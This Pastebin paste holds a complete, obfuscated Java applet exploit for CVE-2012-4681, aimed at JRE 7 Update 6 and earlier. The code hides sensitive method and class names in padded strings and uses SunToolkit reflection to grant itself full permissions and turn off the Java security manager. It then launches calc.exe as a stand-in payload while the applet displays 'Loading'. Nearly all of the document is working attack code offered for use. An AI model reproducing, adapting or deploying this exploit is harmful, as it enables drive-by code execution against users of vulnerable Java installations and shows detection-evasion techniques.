Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * Java 7 Exploit CVE-2012-4681
- *
- * Affected product versions:
- * - JDK and JRE 7 Update 6 and before
- *
- * Post link: http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html
- */
- import java.applet.Applet;
- import java.awt.Graphics;
- import java.beans.Expression;
- import java.beans.Statement;
- import java.lang.reflect.Field;
- import java.net.URL;
- import java.security.*;
- import java.security.cert.Certificate;
- public class Gondvv extends Applet
- {
- String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
- char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
- char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47}; // file
- String ad = "or",me = "me", aw = "f", kl = "Na"; // forName
- String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567"; // getField
- public Gondvv()
- {
- }
- public void disableSecurity()
- throws Throwable
- {
- Statement localStatement = new Statement(System.class, secMan.replaceAll("\\d",""), new Object[1]);
- Permissions localPermissions = new Permissions();
- localPermissions.add(new AllPermission());
- ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL(new String(file)), new Certificate[0]), localPermissions);
- AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
- localProtectionDomain
- });
- SetField(Statement.class, "a"+"c"+"c", localStatement, localAccessControlContext);
- localStatement.execute();
- }
- private Class GetClass(String paramString)
- throws Throwable
- {
- Object arrayOfObject[] = new Object[1];
- arrayOfObject[0] = paramString;
- Expression localExpression = new Expression(Class.class, aw+ad+kl+me, arrayOfObject);
- localExpression.execute();
- return (Class)localExpression.getValue();
- }
- private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
- throws Throwable
- {
- Object arrayOfObject[] = new Object[2];
- arrayOfObject[0] = paramClass;
- arrayOfObject[1] = paramString;
- Expression localExpression = new Expression(GetClass(new String(sun)), field.replaceAll("\\d",""), arrayOfObject);
- localExpression.execute();
- ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
- }
- public void init()
- {
- try
- {
- disableSecurity();
- Process localProcess = null;
- localProcess = Runtime.getRuntime().exec("calc.exe");
- if(localProcess != null);
- localProcess.waitFor();
- }
- catch(Throwable localThrowable)
- {
- localThrowable.printStackTrace();
- }
- }
- public void paint(Graphics paramGraphics)
- {
- paramGraphics.drawString("Loading", 50, 25);
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement